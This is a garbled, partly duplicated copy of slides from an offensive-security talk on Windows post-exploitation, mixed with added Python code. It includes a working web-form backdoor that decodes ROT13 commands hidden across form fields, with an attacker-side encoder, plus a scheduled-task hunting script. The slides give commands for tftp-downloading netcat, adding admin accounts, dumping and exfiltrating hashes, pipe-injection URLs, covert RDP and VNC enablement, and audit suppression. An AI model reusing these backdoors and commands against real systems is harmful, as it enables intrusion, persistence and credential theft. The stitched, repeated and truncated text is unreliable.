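# Assumed trigger: the request is ordinary unless both fields match exactly.
TRIGGER = {"Name": "John Smith", "Age": "42"}

# Hypothetical marker. The rot13 command sits between two copies of it and may
# be spread over any of the fields; fields after the closing stub are ignored.
STUB = "x7Q"

# Constructed POST bodies: an ordinary submission, and one carrying "whoami"
# ("jubnzv" in rot13) split over Address and City, with the closing stub
# URL-encoded as %78%37Q.
NORMAL_BODY = "Name=Jane+Doe&Age=42&Address=1+Main+St&Lang=en"
TRIGGER_BODY = "Name=John+Smith&Age=42&Address=x7Qjub&City=nzv%78%37Q&Lang=en"


def extract_command(body):
    """Backdoor side. Return the hidden command, or None when the request
    should fall through to the app's normal handling."""
    fields = parse_qsl(body, keep_blank_values=True)  # undoes %xx and '+' for every field
    values = dict(fields)
    if any(values.get(key) != want for key, want in TRIGGER.items()):
        return None
    blob = "".join(value for _, value in fields)  # concatenate in submission order
    start = blob.find(STUB)
    if start < 0:
        return None
    start += len(STUB)
    end = blob.find(STUB, start)
    if end < 0:
        return None
    return codecs.decode(blob[start:end], "rot_13")


def encode_request(command, split_at=3):
    """Attacker side. rot13 the command, wrap it in the stub, spread it over the
    Address and City fields, and URL-encode the whole form so it looks like any
    other submission of the same form."""
    encoded = STUB + codecs.encode(command, "rot_13") + STUB
    form = [
        ("Name", TRIGGER["Name"]),
        ("Age", TRIGGER["Age"]),
        ("Address", encoded[:split_at]),
        ("City", encoded[split_at:]),
        ("Lang", "en"),
    ]
    return urlencode(form)


if __name__ == "__main__":
    print(extract_command(NORMAL_BODY))        # None: handled as a normal request
    print(extract_command(TRIGGER_BODY))       # whoami
    print(encode_request("net user"))
    print(extract_command(encode_request("net user")))
```

The decoder never looks at a single field, which is what makes the slide's point about code review hard to argue with: no one field contains anything that looks like a command, and the trigger values are plausible form input.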
Slide 28
Persistence
• Covert accounts
  – Add an account, or re-enable one
  – Modify local account policies to allow access
    • Ex: SUPPORT_388945a0, Guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files or new accounts
  – Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth: Evading Detection
Slide 31
Stealth: Evading Detection
• Hiding your activity
  – From:
    • IDS
    • AV
    • Logging
    • Suspicious users & admins
    • Firewalls
    • Process listing
Slide 32
Stealth: Evading Detection
• Why stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth: Evading Detection
• Goals
  – Keep the system operable
    • If it breaks, you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth: Evading Detection
• Manual/existing tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels, steganography
  – Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth: Evading Detection
• Different perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth: Evading Detection
• Different perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth: Evading Detection
• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = no auditing = no logs
    (for object-access events on that object; the system audit policy and other event sources, logon events for instance, are unaffected, so this hides access to a file or key rather than the session that accessed it)
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials/access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Old-school techniques can get results on new problems
• Remember this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    Net use \\target\ipc$ password /user:username
    At \\target 12:00 pm command
    Ex: At \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Add users
  – Mess with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
    – Write a batch file that executes everything at once
    – Have the target send you back whatever info you want
    – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – Net use \\target
  – Net time \\target
  – At \\target (net time + 1 min) "tftp -i use GET e.bat"
  – At \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
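Slides 57-61 describe a scheduler pattern that is easy to hunt for: jobs named At<n> (the names the AT command assigns), one-shot, running as SYSTEM, chained a minute or two apart, with a tftp GET followed by a batch file or an account-adding command. The Python below is an added defensive example, not part of the talk; it scores a scheduled-task inventory against those traits. The inventory is a constructed CSV modelled on `schtasks /query /v /fo csv` output and reduced to the columns used here; hostnames, times and commands are made up.

```python
"""Hunt for AT-scheduler abuse (slides 57-61) in a scheduled-task inventory.
Added defensive example, not code from the talk."""
import csv
import io
import re
from datetime import datetime
from typing import Dict, List

# Constructed sample in the shape of `schtasks /query /v /fo csv`, trimmed
# to the columns this check uses. All values are made up.
SAMPLE_CSV = """\
"HostName","TaskName","Run As User","Schedule Type","Start Time","Start Date","Task To Run"
"WS01","\\At1","SYSTEM","One Time Only","12:01:00","1/15/2008","tftp -i 10.0.0.5 GET e.bat"
"WS01","\\At2","SYSTEM","One Time Only","12:02:00","1/15/2008","e.bat"
"WS01","\\Backup Nightly","DOMAIN\\svc_backup","Daily","02:00:00","1/1/2008","C:\\Tools\\backup.exe /full"
"WS02","\\At7","SYSTEM","One Time Only","09:30:00","1/15/2008","net user hacked hacked /add"
"WS03","\\Defrag","SYSTEM","Weekly","03:00:00","1/1/2008","defrag.exe C:"
"""

# AT-created jobs are named At1, At2, ... (shown with a leading backslash).
AT_NAME = re.compile(r"^\\?At\d+$", re.IGNORECASE)

# Command traits taken from the e.bat walk-through on slide 61.
SUSPICIOUS_CMD = [
    (re.compile(r"\btftp\b.*\bGET\b", re.IGNORECASE), "tftp download"),
    (re.compile(r"\bnet\s+user\b.*/add", re.IGNORECASE), "local account creation"),
    (re.compile(r"\bnet\s+localgroup\s+administrators\b.*/add", re.IGNORECASE), "admin group change"),
    (re.compile(r"\.bat\b", re.IGNORECASE), "batch file execution"),
]
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}
WINDOW_MINUTES = 2  # slide 60/61: jobs queued +1 min and +2 min apart


def parse_tasks(csv_text: str) -> List[Dict[str, str]]:
    """Read the inventory into one dict per task."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def task_start(task: Dict[str, str]) -> datetime:
    """Combine the Start Date / Start Time columns into a datetime."""
    return datetime.strptime(f"{task['Start Date']} {task['Start Time']}", "%m/%d/%Y %H:%M:%S")


def score_task(task: Dict[str, str]) -> List[str]:
    """Return the per-task reasons a job looks like AT abuse (empty if benign)."""
    reasons: List[str] = []
    if AT_NAME.match(task["TaskName"]):
        reasons.append("AT-style job name")
    if task["Run As User"].lower() in SYSTEM_ACCOUNTS and task["Schedule Type"] == "One Time Only":
        reasons.append("one-shot job running as SYSTEM")
    for pattern, label in SUSPICIOUS_CMD:
        if pattern.search(task["Task To Run"]):
            reasons.append(label)
    return reasons


def find_at_abuse(csv_text: str, min_reasons: int = 2) -> Dict[str, List[Dict[str, object]]]:
    """Group tasks by host, add the chaining signal, and keep tasks with
    at least `min_reasons` reasons. Returns {host: [finding, ...]}."""
    per_host: Dict[str, List[Dict[str, str]]] = {}
    for task in parse_tasks(csv_text):
        per_host.setdefault(task["HostName"], []).append(task)

    findings: Dict[str, List[Dict[str, object]]] = {}
    for host, tasks in per_host.items():
        # Two AT jobs on one host starting within the window is the
        # "download, then run" sequence from slide 61.
        at_jobs = sorted((t for t in tasks if AT_NAME.match(t["TaskName"])), key=task_start)
        chained = set()
        for first, second in zip(at_jobs, at_jobs[1:]):
            if (task_start(second) - task_start(first)).total_seconds() <= WINDOW_MINUTES * 60:
                chained.update({first["TaskName"], second["TaskName"]})
        for task in tasks:
            reasons = score_task(task)
            if task["TaskName"] in chained:
                reasons.append(f"chained with another AT job within {WINDOW_MINUTES} min")
            if len(reasons) >= min_reasons:
                findings.setdefault(host, []).append(
                    {"task": task["TaskName"], "command": task["Task To Run"], "reasons": reasons}
                )
    return findings


if __name__ == "__main__":
    for host, hits in find_at_abuse(SAMPLE_CSV).items():
        for hit in hits:
            print(f"{host} {hit['task']}: {hit['command']!r} -> {', '.join(hit['reasons'])}")
```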
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session / credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 21
Persistence
• Leveraging existing persistent admin access
• Nagios checks
• Attack Configuration Management
– Cfengine
– SMS
– Automated Patching Systems ("patch" them with our trojans)
• GUIs
• Tool distribution
Slide 22
Persistence
• Example
• Machine has VNC installed
• Replace installed VNC with vulnerable version
– Authentication bypass
• Copy registry password so target doesn't realize
• Persistence with no backdoors or rootkits to get detected
Slide 23
Persistence
• Add vulnerable code
• Example: web apps
– Take out user input validation
– Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
– Look for apps with previous vulnerabilities
– Re-introduce patched bugs
Slide 24
Persistence
• More web app examples
• Add hidden field to HTML form
– Users detect no change, app performs normally
<input type="hidden" name="Lang">
• Edit web app and tie vulnerable perl code to form field input
if (defined $hidden_field) { open($filename, "$hidden_field"); }
(two-argument open: a field value that begins or ends with "|" is run as a shell command instead of being opened as a file)
• Craft a POST including the hidden field
Slide 25
Persistence
• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
– Especially good in big apps
– Code review can't even be sure of maliciousness
– Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this
Slide 26
Persistence
• Take concept to another level
– Add a decoder to web app
– Look for a "trigger" string combination in form fields
– If Name = John Smith and Age = 42 then execute contents of Address field
– URL encode form entries containing commands
– Have identifier "stub" in encoded data for app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
– Further encoding
– Take entries from all fields
– Concat them
– "Decode" commands
– Rotational ciphers (rot13, Caesar)
– Even more complex obfuscation
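The decoder described on slides 26 and 27 (and the hidden-field idea of slides 24 and 25) can be modelled end to end. The Python below is an added example written for this page, not code from the talk or from the Offensive Computing tools: a form handler that behaves normally for everyone except a submission carrying the trigger combination, in which case it concatenates the carrier fields, URL-decodes them, finds the stub, ROT13-decodes the rest and recovers the command. The trigger values come from slide 26; the stub string, the carrier field names and the field order are assumptions. The command is returned rather than executed, and the attacker-side encoder is included so the round trip can be checked offline on constructed input.

```python
import codecs
from typing import Dict, Optional
from urllib.parse import quote_plus, unquote_plus

# Assumed trigger combination (slide 26 uses Name = John Smith, Age = 42).
TRIGGER = {"Name": "John Smith", "Age": "42"}
# Assumed identifier stub the decoder searches for inside the decoded data.
STUB = "zq9:"
# Assumed carrier fields; their contents are concatenated in this fixed order.
CARRIER_FIELDS = ("Address", "City", "Zip", "Comment")


def is_triggered(form: Dict[str, str]) -> bool:
    """True only when every trigger field carries exactly its trigger value."""
    return all(form.get(key) == value for key, value in TRIGGER.items())


def decode_command(form: Dict[str, str]) -> Optional[str]:
    """Return the hidden command for a trigger submission, else None.

    Decoding order mirrors slides 26-27: concatenate all carrier fields,
    URL-decode the result, locate the stub, ROT13 the remainder.
    """
    if not is_triggered(form):
        return None
    joined = "".join(form.get(field, "") for field in CARRIER_FIELDS)
    decoded = unquote_plus(joined)
    start = decoded.find(STUB)
    if start < 0:
        return None  # trigger matched but no stub: handle as a normal submission
    return codecs.decode(decoded[start + len(STUB):], "rot_13")


def encode_command(cmd: str) -> Dict[str, str]:
    """Attacker side: build carrier-field values that decode_command reverses.

    ROT13 first, prefix the stub, URL-encode, then spread the result across
    the carrier fields so no single field holds a recognisable command.
    """
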